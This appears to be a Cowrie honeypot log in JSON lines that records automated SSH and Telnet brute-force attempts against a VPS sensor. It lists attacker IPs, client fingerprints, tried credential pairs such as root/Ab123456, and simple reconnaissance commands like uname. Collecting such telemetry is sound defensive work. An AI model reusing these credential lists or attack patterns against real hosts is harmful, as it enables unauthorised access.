{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:24:54.983281Z","src_ip":"212.227.235.229","session":"0650907e3d8e"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:24:56.082511Z","src_ip":"212.227.235.229","session":"0650907e3d8e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:57.347330Z","src_ip":"212.227.235.229","session":"0650907e3d8e"}
{"eventid":"cowrie.session.closed","duration":10.120134353637695,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:02.257275Z","src_ip":"3.132.23.201","session":"2b3b4b012136"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42958,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd87092d7c67","protocol":"ssh","message":"New connection: 212.227.125.160:42958 (1.2.3.4:22) [session: fd87092d7c67]","sensor":"my-vps","timestamp":"2025-08-28T06:25:04.512893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:25:04.513832Z","src_ip":"212.227.125.160","session":"fd87092d7c67"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:25:04.732850Z","src_ip":"212.227.125.160","session":"fd87092d7c67"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":50240,"dst_ip":"1.2.3.4","dst_port":22,"session":"63e83a27736e","protocol":"ssh","message":"New connection: 80.94.95.15:50240 (1.2.3.4:22) [session: 63e83a27736e]","sensor":"my-vps","timestamp":"2025-08-28T06:25:05.137122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:25:05.138002Z","src_ip":"80.94.95.15","session":"63e83a27736e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:25:05.192505Z","src_ip":"80.94.95.15","session":"63e83a27736e"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:25:05.396112Z","src_ip":"212.227.125.160","session":"fd87092d7c67"}
{"eventid":"cowrie.login.failed","username":"luis","password":"luis","message":"login attempt [luis/luis] failed","sensor":"my-vps","timestamp":"2025-08-28T06:25:05.485253Z","src_ip":"80.94.95.15","session":"63e83a27736e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:25:06.180162Z","src_ip":"212.227.125.160","session":"fd87092d7c67"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:25:06.181121Z","src_ip":"212.227.125.160","session":"fd87092d7c67"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:06.451604Z","src_ip":"212.227.125.160","session":"fd87092d7c67"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:06.452874Z","src_ip":"212.227.125.160","session":"fd87092d7c67"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abc123","message":"login attempt [luis/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:25:06.538067Z","src_ip":"80.94.95.15","session":"63e83a27736e"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abcd123","message":"login attempt [luis/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:25:07.592130Z","src_ip":"80.94.95.15","session":"63e83a27736e"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":44396,"dst_ip":"1.2.3.4","dst_port":23,"session":"19050c330cb3","protocol":"telnet","message":"New connection: 8.222.212.69:44396 (1.2.3.4:23) [session: 19050c330cb3]","sensor":"my-vps","timestamp":"2025-08-28T06:25:07.897538Z"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abcd1234","message":"login attempt [luis/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:25:08.647618Z","src_ip":"80.94.95.15","session":"63e83a27736e"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abc1234","message":"login attempt [luis/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:25:09.701790Z","src_ip":"80.94.95.15","session":"63e83a27736e"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:10.756541Z","src_ip":"80.94.95.15","session":"63e83a27736e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56608,"dst_ip":"1.2.3.4","dst_port":22,"session":"6acb97a330a0","protocol":"ssh","message":"New connection: 212.227.235.229:56608 (1.2.3.4:22) [session: 6acb97a330a0]","sensor":"my-vps","timestamp":"2025-08-28T06:25:11.270144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:25:11.271072Z","src_ip":"212.227.235.229","session":"6acb97a330a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:25:11.522202Z","src_ip":"212.227.235.229","session":"6acb97a330a0"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:25:12.279148Z","src_ip":"212.227.235.229","session":"6acb97a330a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:25:12.878381Z","src_ip":"212.227.235.229","session":"6acb97a330a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:25:12.879173Z","src_ip":"212.227.235.229","session":"6acb97a330a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:13.133433Z","src_ip":"212.227.235.229","session":"6acb97a330a0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:13.134644Z","src_ip":"212.227.235.229","session":"6acb97a330a0"}
{"eventid":"cowrie.session.closed","duration":31.75571846961975,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:17.955686Z","src_ip":"8.222.212.69","session":"f43c34fd4f3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39226,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee0806ee4428","protocol":"telnet","message":"New connection: 212.227.125.160:39226 (1.2.3.4:23) [session: ee0806ee4428]","sensor":"my-vps","timestamp":"2025-08-28T06:25:19.986571Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:25:20.073141Z","src_ip":"212.227.125.160","session":"ee0806ee4428"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:25:20.096443Z","src_ip":"212.227.125.160","session":"ee0806ee4428"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T06:25:20.097476Z","src_ip":"212.227.125.160","session":"ee0806ee4428"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T06:25:20.098401Z","src_ip":"212.227.125.160","session":"ee0806ee4428"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34026,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b5b0c7de7cc","protocol":"ssh","message":"New connection: 212.227.125.160:34026 (1.2.3.4:22) [session: 5b5b0c7de7cc]","sensor":"my-vps","timestamp":"2025-08-28T06:25:20.988904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:25:21.002699Z","src_ip":"212.227.125.160","session":"5b5b0c7de7cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:25:21.221322Z","src_ip":"212.227.125.160","session":"5b5b0c7de7cc"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:25:22.149579Z","src_ip":"212.227.125.160","session":"5b5b0c7de7cc"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:23.384564Z","src_ip":"212.227.125.160","session":"5b5b0c7de7cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58016,"dst_ip":"1.2.3.4","dst_port":22,"session":"22c6fd420c2b","protocol":"ssh","message":"New connection: 212.227.235.229:58016 (1.2.3.4:22) [session: 22c6fd420c2b]","sensor":"my-vps","timestamp":"2025-08-28T06:25:27.564918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:25:27.566714Z","src_ip":"212.227.235.229","session":"22c6fd420c2b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:25:27.814013Z","src_ip":"212.227.235.229","session":"22c6fd420c2b"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:25:28.558032Z","src_ip":"212.227.235.229","session":"22c6fd420c2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40576,"dst_ip":"1.2.3.4","dst_port":22,"session":"d88cdad316b3","protocol":"ssh","message":"New connection: 212.227.125.160:40576 (1.2.3.4:22) [session: d88cdad316b3]","sensor":"my-vps","timestamp":"2025-08-28T06:25:29.406009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:25:29.624623Z","src_ip":"212.227.125.160","session":"d88cdad316b3"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-28T06:25:29.785095Z","src_ip":"212.227.125.160","session":"d88cdad316b3"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:29.807007Z","src_ip":"212.227.235.229","session":"22c6fd420c2b"}
{"eventid":"cowrie.login.success","username":"root","password":"zj1234%^&*","message":"login attempt [root/zj1234%^&*] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:25:30.612783Z","src_ip":"212.227.125.160","session":"d88cdad316b3"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:30.841648Z","src_ip":"212.227.125.160","session":"d88cdad316b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55720,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf987cc193ba","protocol":"ssh","message":"New connection: 212.227.125.160:55720 (1.2.3.4:22) [session: cf987cc193ba]","sensor":"my-vps","timestamp":"2025-08-28T06:25:30.977505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:25:30.978437Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:25:31.025685Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.login.success","username":"root","password":"zj1234%^&*","message":"login attempt [root/zj1234%^&*] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:25:31.169725Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47992,"dst_ip":"1.2.3.4","dst_port":22,"session":"27327ec9fd4d","protocol":"ssh","message":"New connection: 212.227.125.160:47992 (1.2.3.4:22) [session: 27327ec9fd4d]","sensor":"my-vps","timestamp":"2025-08-28T06:25:37.140881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:25:37.147793Z","src_ip":"212.227.125.160","session":"27327ec9fd4d"}
